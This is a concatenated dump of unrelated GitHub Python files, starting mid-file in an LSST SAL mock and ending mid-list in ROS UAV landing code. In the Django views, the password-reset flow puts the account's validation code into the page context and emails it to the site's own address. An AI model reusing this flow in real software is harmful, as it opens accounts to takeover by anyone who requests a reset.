NameError(\"Command %d not found\" % cmdId)\n\n await asyncio.sleep(2)\n \n print(\"%s laser is warm\" % (time.asctime()), file=sys.stderr)\n sys.stderr.flush()\n del self._pending[cmdId]\n\n return Command.COMPLETE\n\n def issueCommand_cameraIntegrate(self, data):\n cmdId = self.__getCmdId(data.cmdName)\n self._pending[cmdId] = data\n\n print(\"%s opening shutter\" % (time.asctime()), file=sys.stderr)\n sys.stderr.flush()\n\n return cmdId\n\n def getResponse_cameraIntegrate(self, cmdId, timeout=0):\n if not cmdId in self._pending:\n raise NameError(\"Command %d not found\" % cmdId)\n\n data = self._pending[cmdId]\n\n if time.time() < data.time0 + data.expTime:\n return Command.INPROGRESS\n\n print(\"%s Shutter closed\" % (time.asctime()), file=sys.stderr)\n sys.stderr.flush()\n\n del self._pending[cmdId]\n\n Event.getEvent(\"exposureId\").done = True # exposure ID is available\n\n return Command.COMPLETE\n\n async def waitForCompletion_cameraIntegrate(self, cmdId, timeout=0, pollTime=0.1):\n if not cmdId in self._pending:\n raise NameError(\"Command %d not found\" % cmdId)\n\n while True:\n status = self.getResponse_cameraIntegrate(cmdId)\n \n if status == Command.COMPLETE:\n return status\n\n if timeout > 0 and time.time() > data.time0 + timeout:\n return Command.TIMEOUT\n\n await asyncio.sleep(pollTime)\n\n#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\n def getEvent_SummaryState(self, event):\n return 0 if event.done else 1\n\n#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n \nclass Data():\n \"\"\"Base class for all data objects\"\"\"\n\n def __init__(self, cmdName):\n self.cmdName = cmdName\n if cmdName is not None:\n self.log = logging.getLogger(cmdName)\n self.time0 = time.time()\n\nclass camera_command_setFilterC(Data): \n def __init__(self, filterName):\n super().__init__(\"setFilter\")\n self.filterName = filterName\n \nclass camera_command_turnOnLaserC(Data): \n def __init__(self):\n super().__init__(\"turnOnLaser\")\n \nclass camera_command_cameraIntegrateC(Data): \n def __init__(self, expTime):\n super().__init__(\"cameraIntegrate\")\n self.expTime = expTime\n\nclass Event():\n \"\"\"Base class for all events\"\"\"\n\n _events = {}\n\n @classmethod\n def getEvent(cls, name):\n return cls._events[name]\n\n def __init__(self, name):\n self.name = name\n type(self)._events[name] = self\n\nclass camera_logevent_exposureIdC(Event):\n nextVisit = 0\n\n def __init__(self):\n super().__init__(\"exposureId\")\n self.visit = type(self).nextVisit\n self.done = False\n type(self).nextVisit += 1\n","repo_name":"LSST-nonproject/rhl_auxTel","sub_path":"python/lsst/sal.py","file_name":"sal.py","file_ext":"py","file_size_in_byte":5762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"5114702233","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# author:SingWeek\nimport re\nfrom collections import Counter\n\nfrom broad.util.encodeUtil import dateConverter\n\n\ndef extract_date(content):\n date_reg_exp = re.compile('\\d{4}[-/]\\d{2}[-/]\\d{2}')\n matches_list=date_reg_exp.findall(content)\n standard_matches = []\n for match in matches_list:\n standard_time = dateConverter(match)\n if standard_time != \"\":\n standard_matches.append(standard_time)\n if len(standard_matches) > 0:\n date_str = Counter(standard_matches).most_common(1)[0][0]\n return date_str\n else:\n return None\n\n\nif __name__ == '__main__':\n content = \"如这样的日期2016-12-35也可以匹配到.2016-12-35测试如下.\"\n print(extract_date(content))\n","repo_name":"chensian/Broad_Crawler","sub_path":"broad_crawler/broad/util/date_extract.py","file_name":"date_extract.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25033006253","text":"class Stack:\n def __init__(self):\n self.arr=[]\n\n def push(self,data):\n self.arr.append(data)\n\n def pop(self):\n if self.size()==0:\n return -1\n return self.arr.pop()\n \n def top(self):\n if self.size()==0:\n return -1\n return self.arr[-1]\n \n def size(self):\n return len(self.arr)\n\n\n\n\ndef inValid(s):\n dict = {\"}\":\"{\",\")\":\"(\",\"]\":\"[\"}\n lt = list(s)\n stack = Stack()\n for ele in lt:\n if ele==\"{\" or ele==\"(\" or ele==\"[\":\n stack.push(ele)\n if ele in dict:\n if stack.top()==-1:\n return False\n if stack.top() == dict[ele]:\n stack.pop()\n else:\n return False\n if stack.size()==0:\n return True\n return False\n\n\ns = \"([]){}(\"\nprint(inValid(s))\n\n","repo_name":"abhinav215/DsAlgo","sub_path":"Striver/day13/Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"35762549984","text":"import pandas as pd\n\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\n\nfrom prefect import flow, task\nfrom prefect.task_runners import SequentialTaskRunner\nfrom prefect import get_run_logger \n\nimport datetime\nfrom datetime import datetime\nfrom datetime import date\n\nimport pickle\n\n@task\ndef read_data(path):\n df = pd.read_parquet(path)\n return df\n\n@task\ndef prepare_features(df, categorical, train=True):\n df['duration'] = df.dropOff_datetime - df.pickup_datetime\n df['duration'] = df.duration.dt.total_seconds() / 60\n df = df[(df.duration >= 1) & (df.duration <= 60)].copy()\n\n mean_duration = df.duration.mean()\n \n logger = get_run_logger()\n \n if train:\n logger.info(f\"The mean duration of training is {mean_duration}\")\n\n else:\n logger.info(f\"The mean duration of validation is {mean_duration}\")\n \n df[categorical] = df[categorical].fillna(-1).astype('int').astype('str')\n return df\n\n@task\ndef train_model(df, categorical):\n\n train_dicts = df[categorical].to_dict(orient='records')\n dv = DictVectorizer()\n X_train = dv.fit_transform(train_dicts) \n y_train = df.duration.values\n\n logger = get_run_logger()\n logger.info(f\"The shape of X_train is {X_train.shape}\")\n logger.info(f\"The DictVectorizer has {len(dv.feature_names_)} features\")\n\n lr = LinearRegression()\n lr.fit(X_train, y_train)\n y_pred = lr.predict(X_train)\n mse = mean_squared_error(y_train, y_pred, squared=False)\n logger.info(f\"The MSE of training is: {mse}\")\n return lr, dv\n\n@task\ndef run_model(df, categorical, dv, lr):\n val_dicts = df[categorical].to_dict(orient='records')\n X_val = dv.transform(val_dicts) \n y_pred = lr.predict(X_val)\n y_val = df.duration.values\n\n mse = mean_squared_error(y_val, y_pred, squared=False)\n\n logger = get_run_logger()\n logger.info(f\"The MSE of validation is: {mse}\")\n return\n\n@task\ndef get_path(date_in):\n #str = './data/fhv_tripdata_2021-01.parquet', \n #val_path: str = './data/fhv_tripdata_2021-02.parquet')\n\n #If date is None, use the current day. \n # Use the data from 2 months back as the training data and the data from the previous month as validation data.\n if (date_in == None):\n #process_date = datetime.date.today()\n process_date = date.today()\n else:\n process_date = datetime.strptime(date_in, \"%Y-%m-%d\")\n \n train = \"./data/fhv_tripdata_2021-%02d.parquet\" % (process_date.month -2)\n val = \"./data/fhv_tripdata_2021-%02d.parquet\" % (process_date.month - 1) \n logger = get_run_logger()\n logger.info(f\"Training data path = {train}\")\n logger.info(f\"Validation data path = {val}\")\n\n return train, val\n\n\nfrom prefect.deployments import DeploymentSpec\n#from prefect.orion.schemas.schedules import IntervalSchedule\nfrom prefect.orion.schemas.schedules import CronSchedule\nfrom prefect.flow_runners import SubprocessFlowRunner\n\n@flow(task_runner=SequentialTaskRunner())\n#def main(train_path: str = './data/fhv_tripdata_2021-01.parquet', \n# val_path: str = './data/fhv_tripdata_2021-02.parquet'):\ndef main(date=None):\n \n train_path, val_path = get_path(date).result() \n #str = './data/fhv_tripdata_2021-01.parquet', \n #val_path: str = './data/fhv_tripdata_2021-02.parquet'):\n\n categorical = ['PUlocationID', 'DOlocationID']\n\n df_train = read_data(train_path)\n df_train_processed = prepare_features(df_train, categorical)\n\n df_val = read_data(val_path)\n df_val_processed = prepare_features(df_val, categorical, False)\n\n # train the model\n lr, dv = train_model(df_train_processed, categorical).result()\n run_model(df_val_processed, categorical, dv, lr)\n\n \n model_name = f\"models/model-{date}.bin\"\n dv_name = f\"models/dv-{date}.b\"\n\n with open(model_name, 'wb') as f_out:\n pickle.dump((lr), f_out)\n\n with open(dv_name, \"wb\") as f_out:\n pickle.dump(dv, f_out)\n \n\n#no need to call main from scheduled deployment\n#main()\n#main(\"2021-03-15\")\n#main(date=\"2021-08-15\")\n\nDeploymentSpec(\n flow=main,\n #flow_location=\"./homework.py\",\n name=\"hw3_model_training\",\n schedule=CronSchedule(\n #cron=\"5 * * * *\", #test version every 5 minutes\n cron=\"0 9 15 * *\",\n timezone=\"America/New_York\"),\n flow_runner=SubprocessFlowRunner(),\n #tells to run locally and not in container or k8\n tags=[\"ml-cron\"]\n)\n","repo_name":"sparkyfina/mlops","sub_path":"hw3/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8850800146","text":"import unittest\n\nfrom labella.force import DEFAULT_OPTIONS\nfrom labella.force import Force\nfrom labella.node import Node\n\n\nclass ForceTestCase(unittest.TestCase):\n def test_nodes(self):\n force = Force()\n\n # it should return current value when called without argument\n self.assertEqual(force.nodes(), [])\n force.nodes([1])\n self.assertEqual(force.nodes(), [1])\n # it should set value when called with an argument\n force.nodes([1])\n self.assertEqual(force.nodes(), [1])\n\n def test_options(self):\n force = Force()\n\n # it should return current value when called without an argument\n self.assertEqual(force.options, DEFAULT_OPTIONS)\n\n # it should set value when called with an argument\n force.set_options({\"maxPos\": 200})\n self.assertEqual(force.options[\"maxPos\"], 200)\n force.set_options({\"maxPos\": 400, \"stubWidth\": 30})\n self.assertEqual(force.options[\"maxPos\"], 400)\n self.assertEqual(force.options[\"stubWidth\"], 30)\n\n def test_compute_1(self):\n # should find location for the nodes that make them not overlap\n nodes = [\n Node(1, 50),\n Node(2, 50),\n Node(3, 50),\n Node(3, 50),\n Node(3, 50),\n Node(304, 50),\n Node(454, 50),\n Node(454, 50),\n Node(454, 50),\n Node(804, 50),\n Node(804, 70),\n Node(804, 50),\n Node(804, 50),\n Node(854, 50),\n Node(854, 50),\n ]\n force = Force()\n force.nodes(nodes)\n force.compute()\n\n current_pos = [n.currentPos for n in nodes]\n expected_pos = [\n 25,\n 78,\n 131,\n 184,\n 237,\n 304,\n 401,\n 454,\n 507,\n 673,\n 736,\n 799,\n 852,\n 905,\n 958,\n ]\n self.assertEqual(current_pos, expected_pos)\n\n def test_compute_2(self):\n # should respect the maxPos option\n nodes = [\n Node(1, 50),\n Node(2, 50),\n Node(3, 50),\n Node(3, 50),\n Node(3, 50),\n Node(304, 50),\n Node(454, 50),\n Node(454, 50),\n Node(454, 50),\n Node(804, 50),\n Node(804, 70),\n Node(804, 50),\n Node(804, 50),\n Node(854, 50),\n Node(854, 50),\n ]\n force = Force({\"maxPos\": 904})\n force.nodes(nodes)\n force.compute()\n\n for node in nodes:\n self.assertLessEqual(node.currentRight(), 904)\n\n def test_compute_3(self):\n # should respect the minPos option\n nodes = [\n Node(1, 50),\n Node(2, 50),\n Node(3, 50),\n Node(3, 50),\n Node(3, 50),\n Node(304, 50),\n Node(454, 50),\n Node(454, 50),\n Node(454, 50),\n Node(804, 50),\n Node(804, 70),\n Node(804, 50),\n Node(804, 50),\n Node(854, 50),\n Node(854, 50),\n ]\n force = Force({\"minPos\": 30})\n force.nodes(nodes)\n force.compute()\n\n for node in nodes:\n self.assertGreater(node.currentRight(), 30) # is this right?\n self.assertGreaterEqual(node.currentLeft(), 30)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"GjjvdBurg/labella.py","sub_path":"tests/test_force.py","file_name":"test_force.py","file_ext":"py","file_size_in_byte":3506,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"34"} +{"seq_id":"20457125177","text":"from django.shortcuts import render, render_to_response\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseRedirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import *\nfrom django.conf import settings\nfrom app.login.models import U_hash, calculate_hash\nimport string\nimport random\nimport socket\nfrom datetime import datetime, timedelta\nfrom django.core.mail import send_mail\nfrom django.core.files.storage import FileSystemStorage\n\n\ndef change_password(request):\n if request.user.is_authenticated():\n return HttpResponseRedirect('/home')\n\n user_send = False\n if \"update_Cambio_val\" in request.POST:\n if request.POST.get(\"user\") and not request.POST.get(\"cod_validate\"):\n request.session['usr_change'] = request.POST.get(\"user\")\n try:\n u = User.objects.get(username=request.session['usr_change'])\n if u.is_staff:\n return HttpResponseRedirect('/error/denied')\n if u:\n subject = \"Solicitud cambio de password - Mammoft Inventory Managment\"\n mensaje = \"Usuario: \"+ u.username +\"\\nCódigo de validacion:\"+str(u.u_hash.hash)\n send_mail(subject, mensaje, settings.EMAIL_HOST_USER, [settings.EMAIL_HOST_USER], fail_silently=False)\n\n hash = u.u_hash.hash\n usuario = u.username\n user_send = True\n context = {\"user_send\":user_send,\n \"hash\":hash,\n \"usuario\":usuario}\n return render(request,\"Content_login/Conten_login.html\",context)\n except User.DoesNotExist:\n user_send = False\n context = {\"msg\":\"El usuario no se encuentra en nuestra base de datos\",\n \"user_send\":user_send,}\n request.session.pop('usr_change')\n return render(request,\"Content_login/Conten_login.html\",context)\n\n if \"update_cod\" in request.POST:\n if request.POST.get(\"cod_validate\"):\n can_change = False\n codigo_validacion = request.POST.get(\"cod_validate\")\n usuario = request.session.get('usr_change')\n u = User.objects.get(username=usuario)\n hash = u.u_hash.hash\n if codigo_validacion == hash:\n can_change = True\n user_send = True\n context = {\"user_send\":user_send,\n \"can_change\":can_change,\n \"usuario\":usuario}\n return render(request,\"Content_login/Conten_login.html\",context)\n else:\n hash = u.u_hash.hash\n usuario = u.username\n user_send = True\n context = {\"msg\":\"El codigo de validación no es correcto\",\n \"user_send\":user_send,\n \"hash\":hash,\n \"usuario\":usuario}\n return render(request,\"Content_login/Conten_login.html\",context)\n\n if \"update_pass\" in request.POST:\n if request.POST.get(\"pone\") and request.POST.get(\"ptwo\"):\n p1 = request.POST.get(\"pone\")\n p2 = request.POST.get(\"ptwo\")\n usuario = request.session.get('usr_change')\n u = User.objects.get(username=usuario)\n hash = u.u_hash.hash\n\n if p1 == p2:\n u.set_password(p1)\n u.save()\n U_hash.objects.filter(user_id=u, hash=hash).update(hash=calculate_hash())\n request.session.pop('usr_change')\n return HttpResponseRedirect('/home')\n else:\n can_change = True\n user_send = True\n context = {\"msg\":\"Los password no coinciden\",\n \"user_send\":user_send,\n \"can_change\":can_change,\n \"usuario\":usuario}\n return render(request,\"Content_login/Conten_login.html\",context)\n else:\n usuario = request.session.get('usr_change')\n can_change = True\n user_send = True\n context = {\"msg\":\"Aun no rellenas los campos\",\n \"user_send\":user_send,\n \"can_change\":can_change,\n \"usuario\":usuario}\n return render(request,\"Content_login/Conten_login.html\",context)\n\n context = {\"user_send\":user_send,}\n return render(request,\"Content_login/Conten_login.html\",context)\n\n@login_required(login_url='/login')\ndef profile_view(request):\n u = User.objects.get(username=request.user)\n\n if \"edit_profile\" in request.POST:\n editing = True\n context = {'editing':editing,}\n return render(request, \"user/profile.html\", context)\n\n if \"save_profile\" in request.POST:\n myfile = request.FILES.get('picture')\n fs = FileSystemStorage()\n try:\n filename = fs.save(\"login/users/profile/\" + myfile.name, myfile)\n U_hash.objects.filter(user_id=u).update(avatar=fs.url(filename))\n except AttributeError:\n pass\n\n if \"calendar\" in request.POST:\n nacimiento = request.POST.get(\"calendar\")\n fn = datetime.strptime(nacimiento, '%d/%m/%Y').date()\n age = datetime.now().date() - fn\n age_ac = str((age.days / 365)).split('.')[0]\n U_hash.objects.filter(user_id=u).update(f_nacimiento=fn, edad=age_ac)\n\n if \"gender\" in request.POST:\n U_hash.objects.filter(user_id=u).update(sexo=request.POST.get('gender'))\n\n if \"cargo\" in request.POST:\n if request.POST.get('cargo').strip() != \"\":\n U_hash.objects.filter(user_id=u).update(cargo=request.POST.get('cargo'))\n\n if \"direccion\" in request.POST:\n if request.POST.get('direccion').strip() != \"\":\n U_hash.objects.filter(user_id=u).update(direccion=request.POST.get('direccion'))\n\n editing = False\n context = {'editing':editing}\n return render(request, \"user/profile.html\", context)\n\n context = {}\n return render(request, \"user/profile.html\", context)\n\n@login_required(login_url='/login')\ndef index_view(request):\n if request.user.is_authenticated():\n return HttpResponseRedirect('/home')\n\ndef login_view(request):\n if request.user.is_authenticated():\n return HttpResponseRedirect('/home')\n\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate(username=username, password=password)\n\n if user is not None:\n login(request, user)\n\n if request.user.is_staff:\n logout(request)\n return HttpResponseRedirect('/error/denied')\n\n if request.user.is_authenticated:\n return HttpResponseRedirect('/home')\n else:\n mensaje = 'El usuario existe pero esta deshabilitado'\n logout(request)\n else:\n if request.POST:\n mensaje = 'El usuario o contraseña son incorrecto'\n else:\n mensaje = ''\n\n context = {'mensaje':mensaje}\n return render(request, \"login_page.html\", context)\n\n@login_required(login_url='/login')\ndef home_page(request):\n if not request.user.is_authenticated():\n return HttpResponseRedirect('/')\n return render(request, \"home_page.html\")\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect('/')\n\ndef denied(request):\n referer = request.META.get('HTTP_REFERER')\n context = {'referer':referer}\n return render(request, \"extra/Oops.html\", context)\n","repo_name":"harmideros1/Mammoft_inventory","sub_path":"MAMMOFT_SW_3_4/MAMMOFT_inventory_1_0/app/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"34423026909","text":"'''\n1. You are given a number n, representing the number of rows.\n2. You are given a number m, representing the number of columns.\n3. You are given n*m numbers, representing elements of 2d array a, which represents a gold mine.\n4. You are allowed to take one step left, right, up or down from your current position.\n5. You can't visit a cell with 0 gold and the same cell more than once. \n6. Each cell has a value that is the amount of gold available in the cell.\n7. You are required to identify the maximum amount of gold that can be dug out from the mine if \n you start and stop collecting gold from any position in the grid that has some gold.\n\n'''\n\n\ndef solution(matrix, row, col, bag, is_visited):\n if row < 0 or row >= len(matrix) or col < 0 or col >= len(matrix[row]) or matrix[row][col] == 0 or is_visited[row][col] == True:\n return\n\n is_visited[row][col] = True\n bag.append(matrix[row][col])\n solution(matrix, row-1, col, bag, is_visited)\n solution(matrix, row, col + 1, bag, is_visited)\n solution(matrix, row+1, col, bag, is_visited)\n solution(matrix, row, col - 1, bag, is_visited)\n\n\nmatrix = [\n [0, 1, 4, 2, 8, 2],\n [4, 3, 6, 5, 0, 4],\n [1, 2, 4, 1, 4, 6],\n [2, 0, 7, 3, 2, 2],\n [3, 1, 5, 9, 2, 4],\n [2, 7, 0, 8, 5, 1]\n]\n\n\n_max = 0\nis_visited = [[False for col in row] for row in matrix]\nfor i in range(len(matrix)):\n for j in range(len(matrix[i])):\n if matrix[i][j] != 0 and is_visited[i][j] == False:\n collected_gold = list()\n solution(matrix, i, j, collected_gold, is_visited)\n total_gold = sum(collected_gold)\n if total_gold > _max:\n _max = total_gold\n\nprint(_max)\n","repo_name":"skarwa4491/Python-DSA","sub_path":"Level Up/recursion/gold_mine2.py","file_name":"gold_mine2.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"36335845559","text":"from django.contrib import admin\nfrom .models import Accounts,Accounttransactions,Customers\n# Register your models here.\n\nadmin.site.site_header = 'Bank Management Admin DASHBOARD'\n\n\"SELECT id_customer, name FROM customer\"\nclass CustomersTable(admin.ModelAdmin):\n list_display = [\"id_customer\",\"name\",]\n \n\nadmin.site.register((Accounts,Accounttransactions))\nadmin.site.register(Customers,CustomersTable)","repo_name":"mbagas/tubes_pbo","sub_path":"bank/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"4327955197","text":"# Write a function to shuffle a deck of cards. \n# It must be a perfect shuffle-in other words, each of the 52! permutations of the deck has to be equally likely. \n# Assume that you are given a random number generator which is perfect.\n\nimport random\n\ndef shuffle_cards(cards):\n \"\"\"\n Given a card of elements, \n shuffle the cards. \n Solution: iterate through the card, swapping each element with a random element\n \"\"\"\n \n for i in range(len(cards)):\n \n rand = random.randint(0,i)\n \n # temp = cards[rand]\n # cards[rand] = cards[i] \n # cards[i] = temp\n\n cards[i], cards[rand] = cards[rand], cards[i]\n \n return cards\n\nprint(shuffle_cards([1,2,3,4,5]))","repo_name":"Nyandwi/algorithms","sub_path":"challenges/shuffle_cards.py","file_name":"shuffle_cards.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"34"} +{"seq_id":"28129236604","text":"def solution(sentence, keyword, skips):\n result = ''\n for i in range(len(skips)):\n skip = skips[i]\n key = keyword[i % len(keyword)]\n now, sentence = sentence[:skip], sentence[skip:]\n if key in now:\n idx = now.index(key)\n now1, now2 = now[:idx+1], now[idx+1:]\n result += (now1 + key)\n sentence = now2 + sentence\n else:\n result += (now + key)\n if len(sentence) == 0 and i < len(skips) - 1:\n if skips[i+1] == 0:\n continue\n else:\n break\n result += sentence\n return result\n\n\nprint(solution(\"i love coding\", \"mask\", [0, 0, 3, 2, 3, 4]))\nprint(solution(\"i love coding\", \"mode\", [0, 10]))\nprint(solution(\"abcde fghi\", \"axyz\", [3, 9, 0, 1]))\nprint(solution(\"encrypt this sentence\", \"something\", [0, 1, 3, 2, 9, 2, 0, 3, 0, 2, 4, 1, 3]))","repo_name":"sungyeon-0975/algo_study","sub_path":"220106/암호화_yoon.py","file_name":"암호화_yoon.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"44746270353","text":"from django.test import TestCase, Client\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import reverse\n\nimport tempfile\nfrom PIL import Image\n\nfrom .models import Post, Group\n\n\nclass TestImg(TestCase):\n def setUp(self):\n self.client = Client()\n self.user = User.objects.create_user(\n username='alice', email='mynameis@alice.ru', password='12345'\n )\n self.client.force_login(self.user)\n self.group = Group.objects.create(title='group', slug='noname')\n self.post = Post.objects.create(\n text='Follow the white rabbit.', author=self.user, group=self.group)\n\n def test_page_with_img(self):\n with tempfile.NamedTemporaryFile(suffix='.png', delete=False) as f:\n image = Image.new('RGB', (200, 200), 'white')\n image.save(f, 'PNG')\n with open(f.name, mode='rb') as img:\n self.client.post(reverse('post_edit', kwargs={\n 'username': self.user.username, 'post_id': self.post.id}),\n {'text': 'Image', 'image': img, 'group': self.group.id})\n tag = 'img class=\"card-img\" src=\"/media/'\n response = self.client.get('')\n self.assertContains(response, tag,\n msg_prefix='Тэг не найден на главной странице')\n response = self.client.get(\n reverse('profile', kwargs={'username': self.user.username}))\n self.assertContains(response, tag,\n msg_prefix='Тэг не найден в профайле пользователя')\n response = self.client.get(\n reverse('post', kwargs={'username': self.user.username,\n 'post_id': self.post.id}))\n self.assertContains(response, tag,\n msg_prefix='Тэг не найден на странице просмотра поста')\n response = self.client.get(\n reverse('group', kwargs={'slug': self.post.group.slug}))\n self.assertContains(response, tag,\n msg_prefix='Тэг не найден на странице группы')\n\n def test_not_img(self):\n with tempfile.NamedTemporaryFile(suffix='.txt', delete=False) as f:\n f.write(b'Test text')\n with open(f.name, mode='rb') as not_img:\n response = self.client.post(reverse('post_edit', kwargs={\n 'username': self.user.username, 'post_id': self.post.id}),\n {'text': 'Not image', 'image': not_img}, follow=True)\n self.assertIn('image', response.context['form'].errors)\n","repo_name":"Caterina-Plewako/Yatube","sub_path":"posts/tests/testimg.py","file_name":"testimg.py","file_ext":"py","file_size_in_byte":2664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7824748112","text":"from concrete_autoencoder import ConcreteAutoencoderFeatureSelector\nfrom keras.utils import to_categorical\nfrom keras.layers import Dense, Dropout, LeakyReLU\nimport numpy as np\nimport scipy\nfrom sklearn.model_selection import StratifiedKFold, train_test_split\nimport Paras\nimport Base\n\nfrom keras.datasets import mnist\n\n\ndef decoder(x):\n x = Dense(320)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.1)(x)\n x = Dense(320)(x)\n x = LeakyReLU(0.2)(x)\n x = Dropout(0.1)(x)\n x = Dense(2)(x)\n return x\n\ndef convertVectorMatrix(label):\n y_m = np.zeros((len(label), 2))\n indices_first = np.where(label == -1)[0]\n y_m[indices_first, 0] = 1\n indices_sec = np.where(label == 1)[0]\n y_m[indices_sec, 1] = 1\n return y_m\n\n\nif __name__ == '__main__':\n import sys\n dataset = sys.argv[1]\n run = int(sys.argv[2])\n\n #load data\n mat = scipy.io.loadmat(Paras.data_dir + 'FSMatlab/'+dataset+'.mat')\n X = mat['X'] # data\n X = X.astype(float)\n y = mat['Y'] # label\n y = y[:, 0]\n\n # ensure that y label is either -1 or 1\n num_class, count = np.unique(y, return_counts=True)\n n_classes = np.unique(y).shape[0]\n assert(n_classes == 2)\n min_class = np.min(count)\n unique_classes = np.unique(y)\n y[y == unique_classes[0]] = -1\n y[y == unique_classes[1]] = 1\n y = np.int8(y)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1617, stratify=y)\n y_train = convertVectorMatrix(y_train)\n y_test = convertVectorMatrix(y_test)\n X_train, X_test = Base.normalise_data(X_train, X_test)\n no_features = X_train.shape[1]\n\n selector = ConcreteAutoencoderFeatureSelector(K=20, output_function=decoder, num_epochs=800)\n selector.fit(X_train, y_train)\n\n print('finish')\n","repo_name":"HoaiBach/DE-LSSVM","sub_path":"ConcreteAutoencoders/ConcreteAutoencodersFS.py","file_name":"ConcreteAutoencodersFS.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9912621162","text":"#!/usr/bin/env python\nfrom __future__ import division\nimport rospy\nimport tf\nimport scipy.linalg as la\nimport numpy as np\nfrom math import *\nimport mavros_msgs.srv\nfrom mavros_msgs.msg import AttitudeTarget\nfrom nav_msgs.msg import Odometry\nfrom std_msgs.msg import *\nfrom geometry_msgs.msg import *\nfrom mavros_msgs.msg import *\nfrom quadcopter.msg import *\nimport time\nimport csv\nfrom timeit import default_timer as timer\nfrom gazebo_msgs.msg import ModelStates\nfrom geometry_msgs.msg import Twist\nfrom rosgraph_msgs.msg import Clock\n\n# #########################################################################################################################################################\n#\n# This is the code for landing a single UAV on a moving target with/without coordination\n# It is inbuilt with code for rover trajectory and flag changes\n#\n# #########################################################################################################################################################\n\n\n## Initialize node and publisher to UAV attitude and rover velocity topics\nrospy.init_node('sdre', anonymous=True)\npub = rospy.Publisher(\"/drone0/mavros/setpoint_raw/attitude\", AttitudeTarget, queue_size=1)\npub2 = rospy.Publisher(\"/rover/mavros/setpoint_velocity/cmd_vel_unstamped\", Twist, queue_size=1)\n\n## Getting plots\nposn = open('tight_square.csv', 'w')\n\n## Drone orientation\nroll = 0.0\npitch = 0.0\nyaw = 0.0\n## Rover orientations\nyaw2 = 0.0\ndetect = 0\nnow = rospy.get_time()\nnow_p = rospy.get_time()\n\nmsg = AttitudeTarget()\nmsg2 = Twist()\n\n## Goal is position of rover, goal_body finally contains errors in B\ngoal = np.array([0.0, 0.0, 0.0])\ngoal_body = np.array([0.0, 0.0, 0.0])\n\n## Information of drone\nx = 0.0\ny = 0.0\nz = 0.0\nv_x = 0.0\nv_y = 0.0\nv_z = 0.0\n\n## Rover prev velocities for acc calculations\nv1_p = 0.0\nv2_p = 0.0\nv3 = 0.0 ## Angular velocity about Z\n\npos_rover = [0,0,0]\nacc_rover = [0,0,0]\nvel_rover = [0,0,0]\n\nA = np.array([[0, 1, 0, 0, 0, 0, 0]\n ,[0, 0, 0, 0, 0, 0, 0]\n ,[0, 0, 0, 1, 0, 0, 0]\n ,[0, 0, 0, 0, 0, 0, 0]\n ,[0, 0, 0, 0, 0, 1, 0]\n ,[0, 0, 0, 0, 0, 0, 0]\n ,[0, 0, 0, 0, 0, 0, 0]])\n\nRot_body_to_inertial = np.array([[cos(yaw)*cos(pitch), -sin(yaw)*cos(roll)+sin(roll)*sin(pitch)*cos(yaw), sin(yaw)*sin(roll)+cos(roll)*cos(yaw)*sin(pitch)]\n ,[sin(yaw)*cos(pitch), cos(yaw)*cos(roll)+sin(roll)*sin(pitch)*sin(yaw), -sin(roll)*cos(yaw)+sin(yaw)*sin(pitch)*cos(roll)]\n ,[-sin(pitch), cos(pitch)*sin(roll), cos(pitch)*cos(roll)]])\nRot_inertial_to_body = Rot_body_to_inertial.transpose()\n\n## Trajectory for rover\n# rover_goal = [[3,0]\n# ,[3,3]\n# ,[6,3]\n# ,[6,-3]\n# ,[9,-3]\n# ,[9,3]\n# ,[12,3]\n# ,[12,-3]\n# ,[15,-3]\n# ,[15,3]\n# ,[18,3]\n# ,[18,-3]\n# ,[21,-3]\n# ,[21,3]\n# ,[24,3]\n# ,[24,-3]\n# ,[27,-3]\n# ,[27,3]\n# ,[30,3]\n# ,[30,-3]\n# ,[33,-3]\n# ,[33,3]\n# ,[36,3]\n# ,[36,-3]\n# ,[39,-3]\n# ,[39,3]\n# ,[42,3]\n# ,[42,-3]\n# ,[45,-3]\n# ,[48,3]\n# ,[51,3]\n# 